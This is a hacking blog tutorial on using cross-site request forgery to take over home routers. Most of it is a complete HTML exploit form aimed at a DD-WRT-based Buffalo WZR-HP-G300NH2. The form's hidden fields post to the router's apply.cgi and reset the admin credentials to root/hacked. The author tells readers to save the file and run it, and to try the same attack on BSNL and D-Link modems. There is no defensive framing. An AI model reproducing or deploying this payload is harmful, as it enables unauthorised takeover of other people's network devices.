How To Hack Wireless Modem | Reset Username And Password

Hello friends after a long day gap today i am going to post a small tutorial on how you can hack the modem devices.
So Lets Begin This vulnerability is known as CSRF (Cross-site request forgery) or some say it to be one-click attack so it is a type of attack that allow hackers to change/modify/update on currently connected website/url.

so how hacker use this CSRF attack To change Modem Password and Username lets do it step by step.
for doing this you just need to now what all parameter the cgi page is using.
now consider that you know the parameter that the reset successful page is taking after knowing those things you just need to create a html page that basically call that cgi/successful confirmation on the form action parameter and after doing it the password will successfully changed so i think you must have got some confused lets do it practically.

i am taking an example that is already submitted by one of my friend Prayas a Real quality security expert.
There is a CSRF vulnerability in the Buffalo WZR-HP-G300NH2(A high Speed wireless Modem) and any one easily change or manipulate the admin username and password. This is will POST request and any one can craft malicious html form with specially crafted POST request
to the router and on execution of the form the router's user name and password can be changed to anything.
Here is the exploit
<br /> <html><br /> <!-- Exploit Code by Prayas Kulshrestha --><br /> <body><br /> <h1>This is the PoC for the CSRF vulnerability in the buffalo router Powered by DD-WRT v24SP2-MULTI (10/31/11) std (SVN revision 17798)</h1><h2>click below to see the magic</h2><form action="http://192.168.1.1/apply.cgi" method="POST"><input type="hidden" name="submit_button" value="Management" /><br /> <input type="hidden" name="action" value="ApplyTake" /><br /> <input type="hidden" name="change_action" value="" /><br /> <input type="hidden" name="submit_type" value="" /><br /> <input type="hidden" name="commit" value="1" /><br /> <input type="hidden" name="PasswdModify" value="0" /><br /> <input type="hidden" name="remote_mgt_https" value="0" /><br /> <input type="hidden" name="http_enable" value="1" /><br /> <input type="hidden" name="info_passwd" value="0" /><br /> <input type="hidden" name="https_enable" value="0" /><br /> <input type="hidden" name="http_username" value="root" /><br /> <input type="hidden" name="http_passwd" value="hacked" /><br /> <input type="hidden" name="http_passwdConfirm" value="hacked" /><br /> <input type="hidden" name="_http_enable" value="1" /><br /> <input type="hidden" name="refresh_time" value="3" /><br /> <input type="hidden" name="status_auth" value="1" /><br /> <input type="hidden" name="maskmac" value="1" /><br /> <input type="hidden" name="remote_management" value="0" /><br /> <input type="hidden" name="remote_mgt_ssh" value="0" /><br /> <input type="hidden" name="remote_mgt_telnet" value="0" /><br /> <input type="hidden" name="remote_ip_any" value="1" /><br /> <input type="hidden" name="remote_ip" value="4" /><br /> <input type="hidden" name="remote_ip_0" value="0" /><br /> <input type="hidden" name="remote_ip_1" value="0" /><br /> <input type="hidden" name="remote_ip_2" value="0" /><br /> <input type="hidden" name="remote_ip_3" value="0" /><br /> <input type="hidden" name="remote_ip_4" value="0" /><br /> <input type="hidden" name="boot_wait" value="on" /><br /> <input type="hidden" name="cron_enable" value="1" /><br /> <input type="hidden" name="cron_jobs" value="" /><br /> <input type="hidden" name="nas_enable" value="1" /><br /> <input type="hidden" name="resetbutton_enable" value="1" /><br /> <input type="hidden" name="zebra_enable" value="1" /><br /> <input type="hidden" name="ipv6_enable0" value="0" /><br /> <input type="hidden" name="radvd_enable" value="0" /><br /> <input type="hidden" name="radvd_conf" value="" /><br /> <input type="hidden" name="enable_jffs2" value="0" /><br /> <input type="hidden" name="clean_jffs2" value="0" /><br /> <input type="hidden" name="language" value="english" /><br /> <input type="hidden" name="tcp_congestion_control" value="vegas" /><br /> <input type="hidden" name="ip_conntrack_max" value="4096" /><br /> <input type="hidden" name="ip_conntrack_tcp_timeouts" value="3600" /><br /> <input type="hidden" name="ip_conntrack_udp_timeouts" value="120" /><br /> <input type="hidden" name="samba_mount" value="0" /><br /> <input type="hidden" name="samba_share" value="//yourserverip/yourshare" /><br /> <input type="hidden" name="samba_user" value="username/computer" /><br /> <input type="hidden" name="samba_password" value="iwer573495u7340" /><br /> <input type="hidden" name="samba_script" value="yourscript" /><br /> <input type="submit" value="Owned !" /><br /> </form></body><br /> </html><br />
Save this as anything.htm and this will change the router's user name and password.

username:root
password:hacked
Download The Whole Exploit Here
Now we just did this for Buffalo Modem but as my point of view this particular vulnerability also hit common modem devices like BSNL Modem on rest.cgi,Few D-link wireless modem.You can try your Experiment and put your comments below if you are facing any doubt.

Thank You for reading Do share comment likes :)